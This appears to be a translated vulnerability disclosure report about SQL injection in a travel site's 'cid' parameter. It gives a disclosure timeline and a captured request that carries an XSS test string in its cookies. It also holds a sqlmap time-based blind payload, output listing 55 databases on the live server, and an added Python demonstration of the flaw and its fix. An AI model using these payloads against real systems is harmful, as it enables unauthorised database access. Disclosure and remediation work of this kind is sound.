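2015-09-24: Details reported to the vendor; awaiting vendor handling
2015-09-28: CNCERT (National Internet Emergency Center) has not yet been able to contact the organization concerned; details disclosed only to the notifying agencies
2015-10-08: Details disclosed to core white hats and experts in related fields
2015-10-18: Details disclosed to regular white hats
2015-10-28: Details disclosed to intern white hats
2015-11-12: Details disclosed to the public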
As the title says.
GET /listing/places?cid=1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**:80/
Cookie: PHPSESSID=o5tngg5fs509lr6fg5eeghlau3; backurl=http%3A%2F%2Fwww.**.**.**.**%2Fsearch; callbackurl=%2Fweiboapp%2Flogin%2Fchk; newyear2014_from=http%3A%2F%2F**.**.**.**%2F; todaysidck=55fb963ca305c; referer=http%3A%2F%2F**.**.**.**%2F5343689283%2F4327695; weiboapp_login_backurl=%2Fcampaign%2Fqinghua%2F; __utmt=1; __utma=268593204.2040536378.1442551819.1442551819.1442551819.1; __utmb=268593**.**.**.**2551819; __utmc=268593204; __utmz=268593204.1442551819.1.1.utmcsr=**.**.**.**|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); HMACCOUNT=3BA26C382E083970; Hm_lvt_8b7ad7e6229fe01059ceb32fb2c1a73b=1442563723,1442564047,1442564800,1442566102; Hm_lpvt_8b7ad7e6229fe01059ceb32fb2c1a73b=1442566102; 2014_show=question; _pk_ref.1.07eb=%5B%22%22%2C%22%22%2C1442552029%2C%22http%3A%2F%2Fwww.**.**.**.**%2Fjavascript%3AdomxssExecutionSink(0%2C%5C%22'%5C%5C%5C%22%3E%3Cxsstag%3E()refdxss%5C%22)%22%5D; _pk_id.1.07eb=f126e2a981e3a5cc.1442552029.1.1442566105.1442552029.; _pk_ses.1.07eb=*; 2014_goto=http%3A//**.**.**.**/campaign/newyear/activity/1753936%23to4; _ga=GA1.2.2040536378.1442551819; _gat=1; jiathis_uniqid=144255735255fbada8c2be2
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
The cid parameter is vulnerable to SQL injection.
sqlmap identified the following injection point(s) with a total of 94 HTTP(s) requests:
---
Parameter: cid (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: cid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))XDvI)
---
web application technology: PHP 5.4.42
back-end DBMS: MySQL 5.0.12
The second-to-last database is 途秀's.
web application technology: PHP 5.4.42
back-end DBMS: MySQL 5.0.12
available databases [55]:
[*] `minisite_xqunar\x19`
[*] `performance_sp\\?81ema`
[*] app
[*] atlantis_campaign
[*] ayana
[*] b2b
[*] banff2015db
[*] bhrdb
[*] chinatravelacademy
[*] class_dhinatravelacademy
[*] conference
[*] cool_summer_db
[*] cta_pay
[*] ctb
[*] ctb_apps
[*] ctb_statusnet
[*] ctb_ws
[*] dingla
[*] draweuropedb
[*] dte
[*] hertzintroduce
[*] hirtz
[*] hotelbooking
[*] information_schema
[*] live_meeting
[*] losanheles
[*] mhrdb
[*] minisite_ctrip
[*] minisite_czech
[*] minisite_hertz
[*] minisite_ihg
[*] minisite_loverday
[*] minisite_newyear
[*] minisite_ngwworld
[*] minisite_nontrealcarnival
[*] minisite_phg
[*] minisite_ptf
[*] minisite_riviera
[*] minisite_sweden_education
[*] minisite_sweden_innovation
[*] minisite_sweden_lifestyle
[*] minisite_sweden_music
[*] minisite_villaducale
[*] minisite_visitgurope
[*] minisitf_sweden
[*] miniyite_nwbjg
[*] moevenpick
[*] mysql
[*] opentraveldatabase
[*] piwik
[*] service
[*] sweden_show
[*] test
[*] tripshow
[*] yioulai
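The fix for an injectable numeric parameter such as cid, shown as an added example that is not code from this report or from the affected site. Assumptions: the site's PHP/MySQL source is not on the page, so the places table and both functions are hypothetical, Python's sqlite3 stands in for MySQL, and SLEEP() is a stub that records calls instead of delaying.

```python
import sqlite3

PAYLOAD = "1 AND (SELECT * FROM (SELECT(SLEEP(5)))XDvI)"  # cid value from the report

def make_db():
    """Build a constructed in-memory table; the real schema is not in the report."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE places (id INTEGER PRIMARY KEY, cid INTEGER, name TEXT)")
    db.executemany("INSERT INTO places (cid, name) VALUES (?, ?)",
                   [(1, "place-a"), (1, "place-b"), (2, "place-c")])
    calls = []
    # SQLite has no SLEEP(); this stub logs each call so we can observe
    # whether SQL supplied through cid was actually executed.
    db.create_function("SLEEP", 1, lambda secs: calls.append(secs) or 0)
    return db, calls

def places_vulnerable(db, cid):
    # Assumed shape of the flaw: the raw parameter is concatenated into SQL.
    sql = "SELECT name FROM places WHERE cid = " + cid + " ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def places_hardened(db, cid):
    # 1) Allow-list: cid must be a short run of ASCII digits.
    if not (cid.isascii() and cid.isdigit() and len(cid) <= 9):
        raise ValueError("cid must be a positive integer")
    # 2) Bound parameter: the value never becomes part of the SQL text.
    sql = "SELECT name FROM places WHERE cid = ? ORDER BY id"
    return [row[0] for row in db.execute(sql, (int(cid),))]

def demo():
    db, calls = make_db()
    vulnerable_rows = places_vulnerable(db, PAYLOAD)
    sleep_calls_vulnerable = len(calls)   # > 0 means injected SQL ran
    calls.clear()
    try:
        places_hardened(db, PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    return {"vulnerable_rows": vulnerable_rows,
            "sleep_calls_vulnerable": sleep_calls_vulnerable,
            "rejected": rejected,
            "sleep_calls_hardened": len(calls),
            "normal": places_hardened(db, "1")}

if __name__ == "__main__":
    print(demo())
```

In the concatenated query the stubbed SLEEP() is invoked, which is the behaviour the time-based blind check measures; with validation plus a bound parameter the same input is rejected before any SQL runs.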
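Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-09-28 15:29
CNVD did not directly reproduce the reported vulnerability and has not yet established a direct handling channel with the organization that operates the website; awaiting claim.
None yet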